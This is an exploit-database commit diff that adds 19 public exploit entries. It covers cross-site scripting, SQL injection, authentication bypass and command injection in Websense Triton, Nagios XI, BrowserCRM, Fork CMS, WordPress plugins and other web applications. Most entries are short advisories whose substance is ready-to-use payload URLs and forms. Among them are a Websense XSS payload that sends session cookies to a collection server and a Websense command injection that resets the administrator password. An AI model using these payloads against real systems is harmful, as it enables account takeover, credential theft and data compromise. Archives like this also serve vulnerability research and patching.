DB: 2015-03-21

19 new exploits

files.csv

@@ -32863,3 +32863,22 @@ id,file,description,date,author,platform,type,port
 36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080
 36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443
 36442,platforms/linux/webapps/36442.txt,"Citrix NITRO SDK - Command Injection Vulnerability",2015-03-19,"Han Sahin",linux,webapps,0
+36444,platforms/php/webapps/36444.txt,"WordPress flash-album-gallery Plugin 'flagshow.php' Cross Site Scripting Vulnerability",2011-12-13,Am!r,php,webapps,0
+36445,platforms/php/webapps/36445.txt,"WordPress The Welcomizer Plugin 1.3.9.4 'twiz-index.php' Cross Site Scripting Vulnerability",2011-12-31,Am!r,php,webapps,0
+36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 Multiple Cross Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0
+36447,platforms/php/webapps/36447.txt,"Pulse Pro 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-12-14,"Avram Marius",php,webapps,0
+36448,platforms/php/webapps/36448.txt,"BrowserCRM 5.100.1 modules/Documents/version_list.php parent_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0
+36449,platforms/php/webapps/36449.txt,"BrowserCRM 5.100.1 modules/Documents/index.php contact_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0
+36450,platforms/php/webapps/36450.txt,"BrowserCRM 5.100.1 Multiple Script URI XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0
+36451,platforms/php/webapps/36451.txt,"BrowserCRM 5.100.1 license/index.php framed Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0
+36452,platforms/php/webapps/36452.txt,"BrowserCRM 5.100.1 licence/view.php framed Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0
+36453,platforms/php/webapps/36453.txt,"BrowserCRM 5.100.1 pub/clients.php login[] Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0
+36454,platforms/php/webapps/36454.txt,"BrowserCRM 5.100.1 index.php login[] Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0
+36455,platforms/multiple/remote/36455.txt,"Nagios XI Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2011-12-14,anonymous,multiple,remote,0
+36456,platforms/php/webapps/36456.txt,"Owl Intranet Engine 1.00 'userid' Parameter Authentication Bypass Vulnerability",2011-12-15,"RedTeam Pentesting GmbH",php,webapps,0
+36457,platforms/cgi/webapps/36457.txt,"Websense 7.6 Triton Report Management Interface Cross Site Scripting Vulnerability",2011-12-15,"Ben Williams",cgi,webapps,0
+36458,platforms/cgi/webapps/36458.txt,"Websense 7.6 Triton 'ws_irpt.exe' Remote Command Execution Vulnerability",2011-12-15,"Ben Williams",cgi,webapps,0
+36459,platforms/cgi/webapps/36459.txt,"Websense 7.6 Products 'favorites.exe' Authentication Bypass Vulnerability",2011-12-15,"Ben Williams",cgi,webapps,0
+36460,platforms/php/webapps/36460.txt,"Flirt-Projekt 4.8 'rub' Parameter SQL Injection Vulnerability",2011-12-17,Lazmania61,php,webapps,0
+36461,platforms/php/webapps/36461.txt,"Social Network Community 2 'userID' Parameter SQL Injection Vulnerability",2011-12-17,Lazmania61,php,webapps,0
+36462,platforms/php/webapps/36462.txt,"Video Community Portal 'userID' Parameter SQL Injection Vulnerability",2011-12-18,Lazmania61,php,webapps,0

platforms/cgi/webapps/36457.txt

@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/51085/info
+
+Websense Triton is prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects the following applications:
+
+Websense Web Security Gateway Anywhere v7.6
+Websense Web Security Gateway v7.6
+Websense Web Security v7.6
+Websense Web Filter v7.6 
+
+https://www.example.com/explorer_wse/detail.exe?c=cat&cat=153&anon=&startDate=2011-10-22&endDate=2011-10-22&session=a434cf98f3a402478599a71495a4a71e&dTitle=Internet_use_by_Category"><script>alert(document.cookie)</script>&section=1&uid=&col=1&cor=1&explorer=1&fork=1&puid=7360
+
+Send the current session-cookies to a credentials-collection server:
+
+https://www.example.com/explorer_wse/detail.exe?c=cat&cat=153&anon=&startDate=2011-10-22&endDate=2011-10-22&session=a434cf98f3a402478599a71495a4a71e&dTitle=Internet_use_by_Category"><script>document.location=unescape("http://192.168.1.64/"%2bencodeURIComponent(document.cookie))</script>&section=1&uid=&col=1&cor=1&explorer=1&fork=1&puid=7360

platforms/cgi/webapps/36458.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51086/info
+
+Websense Triton is prone to a remote command-execution vulnerability.
+
+An attacker can exploit this issue to execute arbitrary commands with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. 
+
+https://www.example.com/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user administrator blah| 

platforms/cgi/webapps/36459.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/51087/info
+
+Multiple Websense products are prone to an authentication-bypass vulnerability.
+
+Remote attackers can exploit this issue to bypass the authentication mechanism and gain unauthorized access.
+
+The following Websense products are affected:
+
+Websense Web Security Gateway Anywhere 7.6
+Websense Web Security Gateway 7.6
+Websense Web Security 7.6
+Websense Web Filter 7.6 
+
+https://www.example.com/explorer_wse/favorites.exe?startDate=2011-10-22&endDate=2011-10-23&action=def 

platforms/multiple/remote/36455.txt

@@ -0,0 +1,99 @@
+source: www.securityfocus.com/bid/51069/info
+
+Nagios XI is prone to an HTML injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
+
+Nagios XI versions prior to 2011R1.9 are vulnerable. 
+
+Reflected XSS
+-----
+
+Page:		/nagiosxi/login.php
+Variables:	-
+PoCs:		http://site/nagiosxi/login.php/";alert('0a29');"
+Details:	The URL is copied into JavaScript variable 'backend_url' in an unsafe
+		manner
+		Also affects:
+		/nagiosxi/about/index.php
+		/nagiosxi/about/index.php
+		/nagiosxi/about/main.php
+		/nagiosxi/account/main.php
+		/nagiosxi/account/notifymethods.php
+		/nagiosxi/account/notifymsgs.php
+		/nagiosxi/account/notifyprefs.php
+		/nagiosxi/account/testnotification.php
+		/nagiosxi/help/index.php
+		/nagiosxi/help/main.php
+		/nagiosxi/includes/components/alertstream/go.php
+		/nagiosxi/includes/components/alertstream/index.php
+		/nagiosxi/includes/components/hypermap_replay/index.php
+		/nagiosxi/includes/components/massacknowledge/mass_ack.php
+		/nagiosxi/includes/components/xicore/recurringdowntime.php/
+		/nagiosxi/includes/components/xicore/status.php
+		/nagiosxi/includes/components/xicore/tac.php
+		/nagiosxi/reports/alertheatmap.php
+		/nagiosxi/reports/availability.php
+		/nagiosxi/reports/eventlog.php
+		/nagiosxi/reports/histogram.php
+		/nagiosxi/reports/index.php
+		/nagiosxi/reports/myreports.php
+		/nagiosxi/reports/nagioscorereports.php
+		/nagiosxi/reports/notifications.php
+		/nagiosxi/reports/statehistory.php
+		/nagiosxi/reports/topalertproducers.php
+		/nagiosxi/views/index.php
+		/nagiosxi/views/main.php
+
+Page:		/nagiosxi/account/
+Variables:	xiwindow
+PoCs:		http://site/nagiosxi/account/?xiwindow="></iframe><script>alert(&#039;0a29&#039;)</script>
+
+Page:		/nagiosxi/includes/components/massacknowledge/mass_ack.php
+Variables:	-
+PoCs:		http://site/nagiosxi/includes/components/massacknowledge/mass_ack.php/&#039;><script>alert("0a29")</script>
+
+Page:		/nagiosxi/includes/components/xicore/status.php
+Variables:	hostgroup, style
+PoCs:		http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=&#039;><script>alert("0a29")</script>
+		http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=all&style=><script>alert("0a29")</script>
+
+Page:		/nagiosxi/includes/components/xicore/recurringdowntime.php
+Variables:	-
+PoCs:		http://site/nagiosxi/includes/components/xicore/recurringdowntime.php/&#039;;}}alert(&#039;0a29&#039;)</script>
+
+
+Page:		/nagiosxi/reports/alertheatmap.php
+Variables:	height, host, service, width
+PoCs:		http://site/nagiosxi/reports/alertheatmap.php?height="><script>alert("0a29")</script>
+		http://site/nagiosxi/reports/alertheatmap.php?host="><script>alert("0a29")</script>
+		http://site/nagiosxi/reports/alertheatmap.php?service="><script>alert("0a29")</script>
+		http://site/nagiosxi/reports/alertheatmap.php?width="><script>alert("0a29")</script>
+
+Page:		/nagiosxi/reports/histogram.php
+Variable:	service
+PoCs:		http://site/nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>
+
+Page:		/nagiosxi/reports/notifications.php
+Variables:	host, service
+PoCs:		http://site/nagiosxi/reports/notifications.php?host="><script>alert("0a29")</script>
+		http://site/nagiosxi/reports/notifications.php?service="><script>alert("0a29")</script>
+
+Page:		/nagiosxi/reports/statehistory.php
+Variables:	host, service
+PoCs:		http://site/nagiosxi/reports/statehistory.php?host="><script>alert("0a29")</script>
+		http://site/nagiosxi/reports/statehistory.php?service="><script>alert("0a29")</script>
+
+
+Stored XSS
+-----
+
+Page:		/nagiosxi/reports/myreports.php
+Variable:	title
+Details:	It is possible to store XSS within &#039;My Reports&#039;, however it
+is believed this
+		is only viewable by the logged-in user.
+		1) View a report and save it, e.g.
+		http://site/nagiosxi/reports/myreports.php?add=1&title=Availability+Summary&url=%2Fnagiosxi%2Freports%2Favailability.php&meta_s=a%3A0%3A%7B%7D
+		2) Name the report with XSS, e.g. "><script>alert("0a29")</script>
+

platforms/php/webapps/36444.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51031/info
+
+flash-album-gallery plug-in for WordPress is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/[path]/wp-content/plugins/flash-album-gallery/flagshow.php?pid=[xss] 

platforms/php/webapps/36445.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51037/info
+
+The Welcomizer plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+The Welcomizer 1.3.9.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/wp-content/plugins/the-welcomizer/twiz-index.php?page=[xss] 

platforms/php/webapps/36446.txt

@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/51045/info
+
+Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Fork CMS 3.1.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/blog/detail/article?utm_source=feed&utm_medium=rss"><script>alert(&#039;xss&#039;)</script>  
+
+http://www.example.com/search?form=search&q_widget=&submit="><script>alert(&#039;xss&#039;)</script> 
+ 
+http://www.example.com/search?form=search&q_widget="><script>alert(&#039;xss&#039;)</script>
+
+http://www.example.com/search?form="><script>alert(&#039;xss&#039;)</script>
+
+http://www.example.com/private/en/users/edit?id=1"><script>alert(&#039;xss&#039;)</script>
+
+http://www.example.com/private/en/pages/edit?token=true&id=1"><script>alert(&#039;xss&#039;)</script>
+ 
+http://www.example.com/private/en/mailmotor/settings?token="><script>alert(&#039;xss&#039;)</script> 

platforms/php/webapps/36447.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/51056/info
+
+Pulse Pro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Pulse Pro 1.7.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?p=blocks&d="><script>alert(1)</script>
+http://www.example.com/index.php?p=edit-post&post_id="><script>alert(1)</script> 

platforms/php/webapps/36448.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51060/info
+
+Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Browser CRM 5.100.01 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/modules/Documents/version_list.php?parent_id=1%20AND%201=2%20--%202

platforms/php/webapps/36449.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51060/info
+ 
+Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+Browser CRM 5.100.01 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/modules/Documents/index.php?id=1&contact_id=1%27%20OR%20%271%27=%271

platforms/php/webapps/36450.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/51060/info
+  
+Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+  
+Browser CRM 5.100.01 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/modules/admin/admin_module_index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E
+http://www.example.com/modules/calendar/customise_calendar_times.php/%22%3E%3Cscript%3Ealert%28document.cooki e%29;%3C/script%3E

platforms/php/webapps/36451.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51060/info
+   
+Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+   
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+   
+Browser CRM 5.100.01 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/licence/index.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

platforms/php/webapps/36452.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51060/info
+    
+Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+    
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+    
+Browser CRM 5.100.01 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/licence/view.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

platforms/php/webapps/36453.txt

@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/51060/info
+     
+Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+     
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+     
+Browser CRM 5.100.01 is vulnerable; prior versions may also be affected. 
+
+<form action="http://www.example.com/pub/clients.php" method="post">
+
+<input type="hidden" name="loginwww.example.com" value=&#039;"><script>alert(1);</script>&#039;>
+<input type="hidden" name="login[username]" value=&#039;"><script>alert(2);</script>&#039;>
+<input type="hidden" name="login[password]" value=&#039;"><script>alert(3);</script>&#039;>
+<input type="hidden" name="login[webform]" value=&#039;"><script>alert(4);</script>&#039;>
+<input type="hidden" name="login[disable_email_check]" value=&#039;"><script>alert(5);</script>&#039;>
+<input type="hidden" name="login[client_email]" value=&#039;"><script>alert(6);</script>&#039;>
+<input type="hidden" name="login[client_password]" value=&#039;"><script>alert(7);</script>&#039;>
+<input type="submit" value="submit" id="btn">
+</form>

platforms/php/webapps/36454.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/51060/info
+      
+Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+      
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+      
+Browser CRM 5.100.01 is vulnerable; prior versions may also be affected. 
+
+<form action="http://www.example.com/index.php" method="post">
+<input type="hidden" name="loginwww.example.com" value=&#039;"><script>alert(1);</script>&#039;>
+<input type="hidden" name="login[password]" value=&#039;"><script>alert(2);</script>&#039;>
+<input type="hidden" name="login[rebuild_cache]" value=&#039;"><script>alert(3);</script>&#039;>
+<input type="hidden" name="login[remember_me]" value=&#039;"><script>alert(4);</script>&#039;>
+<input type="hidden" name="login[skin]" value=&#039;"><script>alert(5);</script>&#039;>
+<input type="hidden" name="login[username]" value=&#039;"><script>alert(6);</script>&#039;>
+<input type="submit" value="submit" id="btn">
+</form>

platforms/php/webapps/36456.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/51076/info
+
+Owl Intranet Engine is prone to an authentication-bypass vulnerability.
+
+An attacker can exploit this issue to bypass the authentication process and gain administrative access to the application.
+
+Owl Intranet Engine 1.00 is affected; other versions may also be vulnerable. 
+
+http://www.example.org/owl/admin/index.php?userid=1
+http://www.example.org/owl/admin/index.php?userid=1&newuser
+http://www.example.org/owl/admin/index.php?userid=1&action=edituser&owluser=1 

platforms/php/webapps/36460.txt

@@ -0,0 +1,9 @@
+source:  http://www.securityfocus.com/bid/51106/info
+
+Flirt-Projekt is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Flirt-Projekt 4.8 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/flirtportal/rub2_w.php?kontaktid=f6389d0eeabdb4aaf99f3c3c949dc793&rub=1â??a 

platforms/php/webapps/36461.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51107/info
+
+Social Network Community is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Social Network Community 2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/social2/user.php?userId=12'a 

platforms/php/webapps/36462.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51108/info
+
+Video Community Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/videoportalneu/index.php?d=user&id=2â??a